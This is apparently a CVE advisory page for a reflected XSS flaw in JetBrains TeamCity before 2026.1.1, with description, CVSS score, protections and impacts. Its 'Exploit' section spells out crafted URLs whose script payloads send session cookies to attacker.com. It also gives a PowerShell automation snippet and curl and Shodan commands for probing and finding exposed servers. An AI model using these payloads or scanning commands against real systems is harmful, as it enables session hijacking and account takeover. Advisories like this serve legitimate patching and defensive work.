JetBrains TeamCity, Reflected XSS, CVE-2026-49371 (High) -DC-Jun2026-94

Listen to this Post

CVE-2026-49371 is a reflected cross-site scripting (XSS) vulnerability in JetBrains TeamCity versions prior to 2026.1.1. The flaw resides in the keyword filter functionality, which fails to properly sanitize user-supplied input before reflecting it in HTTP responses. An attacker can craft a malicious URL containing JavaScript code within the filter parameter. When an authenticated user clicks this link, the injected script executes in their browser context. This occurs because TeamCity does not escape or encode special characters like angle brackets and quotes when rendering the keyword filter output. The vulnerability is triggered through the search or filtering interface, where the keyword parameter is echoed back without validation. Exploitation requires user interaction, as the victim must click the crafted link. The attack vector is remote, with low complexity and no special privileges required. The reflected nature means the payload is not stored on the server but is delivered via the URL. Successful exploitation can lead to session hijacking, credential theft, data exfiltration, or unauthorized actions performed on behalf of the victim. The vulnerability is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation). The CVSS 3.1 base score is 8.2 (High) according to NIST, with the vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N. This indicates high confidentiality impact, low integrity impact, and no availability impact. The patch in version 2026.1.1 introduces HTML escaping for all keyword filter output, breaking any injected script tags. Organizations should upgrade immediately or apply virtual patching via WAF rules.

DailyCVE Form:

Platform: JetBrains TeamCity
Version: before 2026.1.1
Vulnerability : Reflected XSS
Severity: High (8.2)
date: 2026-05-29

Prediction: Already patched

Analytics

What Undercode Say:

Check TeamCity version via API
curl -k -u "user:pass" "https://teamcity.example.com/app/rest/server" | grep version
Test for reflected XSS vulnerability
curl -k "https://teamcity.example.com/admin/filter.html?keyword=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E"
Search for vulnerable instances using Shodan
shodan search "JetBrains TeamCity" --fields ip_str,port --limit 10
Extract version from response headers
curl -sI "https://teamcity.example.com" | grep -i "Server"

Exploit:

<!-- Crafted malicious URL for social engineering -->
https://teamcity.example.com/admin/filter.html?keyword=%3Cscript%3Efetch('https://attacker.com/steal?cookie='%2Bdocument.cookie)%3C/script%3E
<!-- Alternative payload stealing session tokens -->
https://teamcity.example.com/admin/filter.html?keyword=%3Csvg/onload=location.href='https://attacker.com/log?data='%2Bdocument.cookie%3E
<!-- PowerShell script to automate exploitation -->
$url = "https://teamcity.example.com/admin/filter.html?keyword=" + [System.Web.HttpUtility]::UrlEncode("<script>alert('XSS')</script>")
Invoke-WebRequest -Uri $url -UseBasicParsing

Protection:

  • Upgrade to TeamCity version 2026.1.1 or later immediately.
  • Implement WAF rules to block XSS patterns in filter parameters.
  • Apply CSP (Content-Security-Policy) headers to restrict script execution.
  • Sanitize all user input with HTML encoding before reflecting in responses.
  • Use HttpOnly and Secure flags for session cookies.
  • Regularly scan TeamCity installations with security tools.

Impact:

  • Execution of arbitrary JavaScript in victim’s browser within TeamCity context.
  • Theft of session cookies leading to account takeover and privilege escalation.
  • Exposure of sensitive CI/CD data, including build secrets and source code.
  • Ability to perform unauthorized actions as the authenticated user.
  • Defacement of TeamCity web interface and redirection to malicious sites.
  • Propagation of attacks to connected systems via stolen credentials.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Previous

Twig, Sandbox Bypass, CVE-2026-24425 (Critical) -DC-Jun2026-93

Scroll to Top